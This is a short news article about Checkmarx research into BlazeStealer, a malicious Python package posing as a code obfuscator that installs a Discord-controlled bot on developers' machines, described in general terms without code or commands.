Python Developers Targeted by Malicious Package

In a recent report by cybersecurity firm Checkmarx, researchers have uncovered a new wave of malware targeting developers working with the widely-used Python language. Specifically designed to infect computers of developers seeking to obfuscate their code, these malicious packages masquerade as legitimate tools, often appearing in open-source code libraries.

According to Checkmarx, attackers have capitalized on the growing trend of developers using tools to obfuscate their code, making it unreadable to unauthorized individuals. This year, the researchers note a surge in attackers posting packages with deceptive names, introducing a sinister element into the mix. The report, released on Wednesday, highlights the latest package named “BlazeStealer,” discovered in October, which carries a “destructive payload.”

Once a developer executes the code, BlazeStealer activates, retrieving an additional malicious script from an external source. This script enables a bot on the Discord messaging service, providing attackers with complete control over the victim’s computer. Checkmarx emphasizes that developers seeking to obfuscate their Python code become attractive targets due to their likely involvement with valuable and sensitive information.

The malicious packages often adopt names resembling clean Python obfuscators, with the October discovery labeled as “pyobfgood.” Once fully operational on the victim’s machine, it opens the door to a range of malicious activities, including data exfiltration, keystroke logging, and direct spying.

Checkmarx points out that the Discord bot, once activated, can secretly capture a photo using the victim’s webcam. The captured image is then transmitted back to the Discord channel, leaving no evidence of its presence after deleting the downloaded files.

The incident underscores the increased scrutiny on open-source code libraries, where attackers are exploiting vulnerabilities to disseminate malware. Earlier this year, cybersecurity company Phylum warned of a rise in attack sophistication targeting developers and package ecosystems. Notably, a vulnerability in the libwepb library drew attention in September, while previous research by Checkmarx revealed malicious scripts targeting the banking sector within packages in the npm JavaScript library.

Against this backdrop, the Biden administration has been urging the industry to enhance efforts in securing open-source software, recognizing the growing significance of these platforms in the digital landscape.

Leave a Reply